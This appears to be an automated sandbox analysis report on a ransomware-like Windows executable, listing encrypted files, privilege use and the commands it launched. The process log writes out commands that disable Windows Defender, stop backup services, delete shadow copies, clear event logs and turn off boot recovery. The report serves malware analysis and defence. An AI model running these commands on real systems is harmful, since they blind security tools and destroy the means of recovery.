| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\epl-v10.html.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_q8AseZwSqjw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_FOCOvny-L9w0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_QxG1P9jnBzs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_ipvKYzSPHPA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Retail-ppd.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_57SM-tzCsMY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\lt.txt.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_g6LEtz05qPg0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\Stationery\HandPrints.jpg | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\about.html.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_vHAeCthxurE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_WDTSMnulozM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\tzdb.dat.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_LmWVEfM6P140.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_xh0OHBF6ROk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_zLHTcggz-eM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_AMH6HGMWHws0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_YUaD1--wfuA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\C2RManifest.officemuiset.msi.16.en-us.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_7Lx0op3dTuE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_U2A80e095r40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_chtD4BzaTAQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_zh_4.4.0.v20140623020002.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_dSJjhjg4dIU0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\fontconfig.properties.src.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_GNfY_Q3ZdOg0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_iwIzs0MgFo40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial2-ppd.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_J8fPu0WWTQM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription-ppd.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_zfZ7x_avG7k0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ja-JP\IpsMigrationPlugin.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_1305b" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_1305b" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_1305b" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 40.119.148.38:123 | time.windows.com | udp |
Files
memory/3140-114-0x0000000000000000-mapping.dmp
memory/3340-115-0x0000000000000000-mapping.dmp
memory/3084-116-0x0000000000000000-mapping.dmp
memory/980-117-0x0000000000000000-mapping.dmp
memory/300-118-0x0000000000000000-mapping.dmp
memory/2232-119-0x0000000000000000-mapping.dmp
memory/2948-120-0x0000000000000000-mapping.dmp
memory/668-121-0x0000000000000000-mapping.dmp
memory/3732-122-0x0000000000000000-mapping.dmp
memory/3820-123-0x0000000000000000-mapping.dmp
memory/3552-124-0x0000000000000000-mapping.dmp
memory/812-125-0x0000000000000000-mapping.dmp
memory/2896-126-0x0000000000000000-mapping.dmp
memory/1504-127-0x0000000000000000-mapping.dmp
memory/1088-128-0x0000000000000000-mapping.dmp
memory/368-129-0x0000000000000000-mapping.dmp
memory/660-130-0x0000000000000000-mapping.dmp
memory/1228-131-0x0000000000000000-mapping.dmp
memory/3664-132-0x0000000000000000-mapping.dmp
memory/1260-133-0x0000000000000000-mapping.dmp
memory/2348-134-0x0000000000000000-mapping.dmp
memory/1324-135-0x0000000000000000-mapping.dmp
memory/2268-136-0x0000000000000000-mapping.dmp
memory/1360-137-0x0000000000000000-mapping.dmp
memory/1792-138-0x0000000000000000-mapping.dmp
memory/1848-139-0x0000000000000000-mapping.dmp
memory/1296-140-0x0000000000000000-mapping.dmp
memory/2172-141-0x0000000000000000-mapping.dmp
memory/2404-142-0x0000000000000000-mapping.dmp
memory/736-143-0x0000000000000000-mapping.dmp
memory/3580-144-0x0000000000000000-mapping.dmp
memory/976-145-0x0000000000000000-mapping.dmp
memory/824-146-0x0000000000000000-mapping.dmp
memory/2992-147-0x0000000000000000-mapping.dmp
memory/3584-148-0x0000000000000000-mapping.dmp
memory/3080-149-0x0000000000000000-mapping.dmp
memory/3212-150-0x0000000000000000-mapping.dmp
memory/1384-151-0x0000000000000000-mapping.dmp
memory/3828-152-0x0000000000000000-mapping.dmp
memory/2592-153-0x0000000000000000-mapping.dmp
memory/912-154-0x0000000000000000-mapping.dmp
memory/1072-155-0x0000000000000000-mapping.dmp
memory/1916-156-0x0000000000000000-mapping.dmp
memory/3796-157-0x0000000000000000-mapping.dmp
memory/3984-158-0x0000000000000000-mapping.dmp
memory/2212-159-0x0000000000000000-mapping.dmp
memory/844-160-0x0000000000000000-mapping.dmp
memory/1504-161-0x0000000000000000-mapping.dmp
memory/1240-162-0x0000000000000000-mapping.dmp
memory/1552-163-0x0000000000000000-mapping.dmp
memory/672-164-0x0000000000000000-mapping.dmp
memory/1456-165-0x0000000000000000-mapping.dmp
memory/2328-166-0x0000000000000000-mapping.dmp
memory/3660-167-0x0000000000000000-mapping.dmp
memory/1328-168-0x0000000000000000-mapping.dmp
memory/1700-169-0x0000000000000000-mapping.dmp
memory/1992-170-0x0000000000000000-mapping.dmp
memory/3944-171-0x0000000000000000-mapping.dmp
memory/2580-172-0x0000000000000000-mapping.dmp
memory/2152-173-0x0000000000000000-mapping.dmp
memory/1300-174-0x0000000000000000-mapping.dmp
memory/2192-175-0x0000000000000000-mapping.dmp
memory/3232-176-0x0000000000000000-mapping.dmp
memory/3152-177-0x0000000000000000-mapping.dmp
memory/1696-178-0x000002C2DB5A0000-0x000002C2DB5A2000-memory.dmp
memory/1696-179-0x000002C2DB5A0000-0x000002C2DB5A2000-memory.dmp
memory/1696-180-0x000002C2DB5A0000-0x000002C2DB5A2000-memory.dmp
memory/1696-181-0x000002C2DB5A0000-0x000002C2DB5A2000-memory.dmp
memory/1696-182-0x000002C2DB5A0000-0x000002C2DB5A2000-memory.dmp
memory/1696-183-0x000002C2DD060000-0x000002C2DD082000-memory.dmp
memory/1696-184-0x000002C2DB5A0000-0x000002C2DB5A2000-memory.dmp
memory/1696-185-0x000002C2DB5A0000-0x000002C2DB5A2000-memory.dmp
memory/1696-186-0x000002C2DB5A0000-0x000002C2DB5A2000-memory.dmp
memory/1696-187-0x000002C2DB5A0000-0x000002C2DB5A2000-memory.dmp
memory/1696-188-0x000002C2F5560000-0x000002C2F55D6000-memory.dmp
memory/1696-189-0x000002C2F5630000-0x000002C2F5632000-memory.dmp
memory/1696-190-0x000002C2F5633000-0x000002C2F5635000-memory.dmp
memory/1696-191-0x000002C2DB5A0000-0x000002C2DB5A2000-memory.dmp
memory/1696-215-0x000002C2F5636000-0x000002C2F5638000-memory.dmp
memory/1696-216-0x000002C2DB5A0000-0x000002C2DB5A2000-memory.dmp
